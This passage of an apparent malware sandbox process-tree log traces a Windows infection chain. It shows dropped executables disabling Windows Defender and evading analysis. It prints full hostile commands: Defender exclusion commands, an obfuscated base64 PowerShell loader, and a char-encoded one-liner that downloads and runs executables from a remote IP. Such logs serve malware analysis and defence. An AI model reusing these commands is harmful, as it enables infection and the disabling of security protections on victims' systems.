                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 25164 -prefMapHandle 3812 -prefMapSize 270279 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3824 -initialChannelId {5e2f9806-6852-499d-a66c-a69b693c9c81} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                        9⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        PID:1476
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3972 -prefsLen 27276 -prefMapHandle 3976 -prefMapSize 270279 -ipcHandle 4044 -initialChannelId {d5257756-46ef-477d-9144-471db1891a7e} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                        9⤵
                                                                                                                                                          PID:2304
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4380 -prefsLen 34775 -prefMapHandle 1604 -prefMapSize 270279 -jsInitHandle 1608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1628 -initialChannelId {8a16b37d-2f13-4e34-8129-650d01bc38be} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                          9⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:3968
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4976 -prefsLen 35012 -prefMapHandle 5084 -prefMapSize 270279 -ipcHandle 5088 -initialChannelId {a97a489d-5658-4d37-b8ec-ac1e0f035104} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                          9⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:7020
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5356 -prefsLen 32952 -prefMapHandle 5360 -prefMapSize 270279 -jsInitHandle 5364 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5372 -initialChannelId {1c1384fe-ef6d-4fc6-a1f8-4e275d072817} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                          9⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:3384
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5576 -prefsLen 32952 -prefMapHandle 5580 -prefMapSize 270279 -jsInitHandle 5584 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5408 -initialChannelId {aa18056a-8743-43a7-b0a1-7328803d6717} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                          9⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:2924
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5748 -prefsLen 32952 -prefMapHandle 5752 -prefMapSize 270279 -jsInitHandle 5756 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5764 -initialChannelId {10b066ef-d651-43f4-b44b-d703bca8b223} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                          9⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:4268
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413400101\f0fa627c66.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413400101\f0fa627c66.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                    • Modifies Windows Defender TamperProtection settings
                                                                                                                                                    • Modifies Windows Defender notification settings
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Windows security modification
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:4556
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:4116
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                      7⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:2448
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:7348
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    PID:7240
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                      7⤵
                                                                                                                                                        PID:7408
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                          8⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:7588
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        "C:\Windows\system32\svchost.exe"
                                                                                                                                                        7⤵
                                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        PID:7404
                                                                                                                                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                          8⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:7244
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                          8⤵
                                                                                                                                                          • Deletes itself
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1928
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:6256
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:3508
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:6300
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
                                                                                                                                                        6⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:12172
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
                                                                                                                                                          7⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:12220
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                                            8⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Drops startup file
                                                                                                                                                            PID:7988
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                                              9⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3064
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:3476
                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                              1⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1192
                                                                                                                                              • C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5116
                                                                                                                                                • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:5816
                                                                                                                                                  • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:724
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                                                                                                                      5⤵
                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                      • Downloads MZ/PE file
                                                                                                                                                      PID:7132
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1764
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2096
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                                                                                  C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:5624
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    C:\Windows\System32\cmd.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2292
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4248
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2924
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    PID:3272
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:6440
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:6708
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:6016
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2804
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6104 -ip 6104
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4400
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3032
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
